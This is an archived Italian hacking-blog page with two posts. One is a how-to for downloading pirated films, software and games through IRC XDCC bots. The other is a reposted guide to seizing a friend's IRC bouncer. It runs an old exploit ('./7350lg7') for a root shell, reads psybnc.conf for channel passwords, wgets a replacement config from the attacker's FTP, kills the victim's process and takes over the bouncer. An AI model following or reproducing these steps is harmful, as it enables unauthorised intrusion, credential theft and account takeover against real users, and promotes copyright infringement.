h4ckarchive v2.2

La nuova risorsa italiana sull’hacking underground

Archive for the ‘IRC Hacking’ Category

File sharing: ora IRC diventa anche un P2P!

with 10 comments

Prima di iniziare: Cos’è IRC?Cos’è il file sharing?

E’ proprio così, dimenticatevi di eMule, Bit Torrent, WinMX, Shareaza, e i vari client usati spesso per il file sharing on-line. Adesso, c’è una semplice soluzione alle code e alla velocità! In IRC, grazie a dei (ro)bot, e all’invio di alcuni comandi, è possibile scaricare gratuitamente film, software, musica, giochi e molto altro on-line e quindi usare IRC come un vero e proprio P2P. Come fare? Vi insegniamo noi con un semplice how-to:

1 ) Scaricate un client IRC (uno dei più famosi per Windows è mIRC, per Linux potete usare X-Chat, gratuiti e facilmente reperibili nel web)

2 ) Dopo aver installato il client IRC è necessario inserire il proprio nickname, nome reale, ident, nelle opzioni. E infine… il server, in cui, basterà dare il comando /server [indirizzo server] per iniziare a connettersi ad un server IRC… (esempio: /server irc.darksin.eu)

3 ) Dopo essere entrati nel server, per ricevere la lista dei canali, dare il comando /list e scegliere un canale dove è presente il file-sharing.

4 ) Dopo averlo scelto, basterà cliccarci sopra 2 volte, per entrare nel canale

5 ) Una delle regole fondamentali quando si entra in un canale è quella di salutare. Se non si saluta, spesso, si è bannati.

6 ) Dopo aver salutato date il comando !list per ricevere una lista, inserita in un sito web, dove è presente tutto il materiale condiviso dai bot.

7 ) Adesso basta cliccare due volte sopra al link del sito web in cui è presenta la lista, e vi si aprirà. Spesso, è presente un motore di ricerca, per cercare il materiale che si cerca. A sinistra di ogni risultato troverete il nickname del bot e a destra il numero del file, ed infine il nome del file.

8 ) Quando avremmo trovato il materiale che cercavamo, basterà dare il comando /msg [nicknamebot] xdcc send #[numero]. Ovviamente al posto di nicknamebot e numero inserirete il nickname del bot e il numero del file che cercavate.

9 ) A questo punto vi si aprirà una finestra per accettare o rifiutare il file che avete richiesto, per accettare basterà fare Accetta oppure Accept se in inglese.

10 ) Vedrete una finestra con la percentuale e i MB scaricati del download in corso. Avete concluso!

11 ) Per aprire il file, aspettate la fine del download. Dopo la fine non chiudete la finestra del download, e cliccate su “Open Folder” oppure “Apri cartella”, e vi si aprirà la cartella su cui è stato scaricato il file che avete richiesto. Se avete chiuso la finestra recatevi su C:\Documents and Settings\nomeutente\Application Data\mIRC\downloads\.

Buon download!

Written by TheDevil

2 gennaio 2008 at 12:25 am

Pubblicato su IRC Hacking

How to hack BNC

with 4 comments

Ecco qui a voi una guida per l’hacking di BNC:

|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
How to Hack Bnc
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
10/6/2003
rrd

Salve ragazzi quanti di voi han voluto bucare il bnc del vostro caro
amichetto di irc? magari takkargli anche il chan?
Prima di tutto tengo a precisare che questa guida non specifica tutti i
particolari ma comunque vi crea una base, successivamente la fantasia
vi porterà a far grandissime cose 😉
Inanzitutto la tecnica usata è di basso livello ma comunque fà sempre
bene sapere qualcosa.
Su ircnet la maggiorparte dei bnc presenti, almeno secondo me son montati
su sistemi SunOS oppure linux.
Parecchi hackeretti spavaldi su irc piazzano bnc in maniera stravagante
ma senza pensare che spesso la shell su cui son montati sia buggata. 😉
Quindi prima cosa da fare è quello di osservare un pò il bnc del nostro
amico, quindi facciamogli un whois. Non dirmi cosa è altrimenti ti uccido
Bene in questa guida penseremo ai bnc piazzati su SunOS, quindi vi
consiglio di leggere la guida sul sito.
Bene, vogliamo sapere se il bnc del nostro amico è su un sistema SunOS?
Facciam uno scan alla porta 21 del suo ip 😉
Se vi da risposta con una versione dalla 4.1 alla 5.8 possiamo procedere.
Ok procuriamoci il vecchio exploit 7350lg7 è lanciamo il seguente comando
./7350lg7 -t1 -d ipbnc
attendiamo qualche secondo
Se vi appare #
siamo a galoppo 😉
Per prima cosa dobbiam kittare la shell quindi leggi il Tutorial:
SunOS hack
Una volta kittata la shell, esserci assicurati che la connessione ssh
funzioni possiamo pensare al bel bnc.
I rootkit delle SunOS al 90% piazzano la dir del bnc in:
/dev/cua/…
Quindi digitiamo:
cd /dev/cua/…
Se non va cerchiamo i file:
find / -name nomefile -print
Bene adesso digitiamo:
ls
Se trovate una sola dir con scritto (psybnc,solbnc,bnc)
Digitiamo:
cd nomedir
Ok adesso siamo dentro ;):
Ora spiamo un pò di informazioni che ne dici?
cat psybnc.conf
bene qui avremo davanti tutte le impostazioni del bnc compreso pass dei
canali ;).
||||
Prima di iniziare preparatevi sul mirc tutte le impostazioni del bnc:
real,ident,address,nick ecc.
Inoltre copiatevi il server a cui è connesso il bnc.
||||
Adesso possiamo scegliere due stradine:
1)Sistemare il .conf a nostro piaciere per poterci connettere e poi
killare il bnc.
2)Sistemare il .conf modificando solamente la password di login

Strada 1
Bene adesso lanciamo il comando:
cat psybnc.conf
cerchiamo la stringa:
PSYBNC.SYSTEM.PORT1=porta>>>ci interessa questa
La porta ci interessa perchè il rootkit aveva già nascosto il processo
in precedenza quindi sarete tranquillamente visibili al netstat.
Ok adesso creiamo sul nostro pc un documento di testo con le seguenti:
PSYBNC.SYSTEM.PORT1=portadelconf
PSYBNC.SYSTEM.HOST1=*
PSYBNC.HOSTALLOWS.ENTRY0=*;*
Ok salviamolo col nome psybnc1.conf.
Mettiamolo sul nostro ftp. Non lo hai? ti ho detto di leggere la guida:
SunOS hack
Ok una volta piazzato mettiamo il file nella shell.
Digitiamo nella shell il seguente comando:
rm psybnc.conf rimuove il vecchio conf
wget http://members.xoom.virgilio.it/mioftp/psybnc1.conf
Se non risolve mettete l ip.
Adesso dobbiamo essere mooolto veloci per fare il tutto:
cat psybnc.pid (legge il numero pid)
kill -9 numerochetiesce (questo comando farà cadere il bnc dell’amico)
rm psybnc.conf (cancella il vecchio conf)
mv psybnc1.conf psybnc.conf (rinomina psybnc1.conf in psybnc.conf)
Ora digitiamo ls:
cerchiamo un file di nome:
solbnc oppure psybnc
Lanciamo la stringa:
./solbnc oppure ./psybnc
Bene adesso veloci apriamo mirc e connettiamoci all’ip e alla porta del
bnc che avevamo settato. Spero abbiate già settato il mirc.
Ok adesso ci chiederà la pass:
./quote pass tuapass
se vi da errore togliete il puntino.
./addserver serverdoveerailbnc :6667
./aidle 1
Bene adesso si connette 😉
Ora dovrete entrare velocemente nei chan in cui era situato il bnc,
se il vostro amico hacker è cosi bravo avrà settato autoop magari da
altri bnc 😉
Io vi consiglio di fare una sola cosa poi scegliete voi:
/setawaynick Nickdelamer’ownz
Uscite dal bnc è non entrate piu. Farete piu bella figura 😉

2 Strada
La seconda strada credo sia piu semplice:
Vi basta entrare in una delle vostre shell dove sia piazzato un bnc
entrare nella dir:
cat psybnc.conf
Cercare la stringa
USER1.USER.PASS==
Bè li ci sarà la pass usata da voi decriptata. avete capito cosa intendo?
Prendete il conf della vittima lo copiate,editate un file di testo
e al posto della sua pass ci mettete la vostra ;):
Naturalmente il tutto seguendo i procedimenti elencati su 😉
Ecco qualche consiglio:
1)Nel conf possiamo trovare anche eventuali proxy usati 😉
2)Nel conf possiamo risalire alla password usata dalla vittima tramite
un decriptatore che spiegherò in altri tutorial
3)Nel conf possiamo trovare eventuali virtualhost
5)Nel conf possiamo trovare eventuali ipv6
Naturalmente trovare queste nel conf è molto semplice 😉
Il breve tutorial termina qui, mi scuso per gli errori ortografici ma
il tempo…. 🙂
Per commenti,suggerimenti,lamentele:
trepalle86@supereva.it

rrd
http://www.nshcrew.cjb.net VOTATELO IL SITO HA BISOGNO DI VOI.

USER1.USER.PASS==`v1F1I’3’z1l0F`h`5
USER1.SERVERS.SERVER1=irc1.us.ircnet.net

Thanks to: http://nsh.altervista.org

Written by TheDevil

1 gennaio 2008 at 5:10 am

Pubblicato su IRC Hacking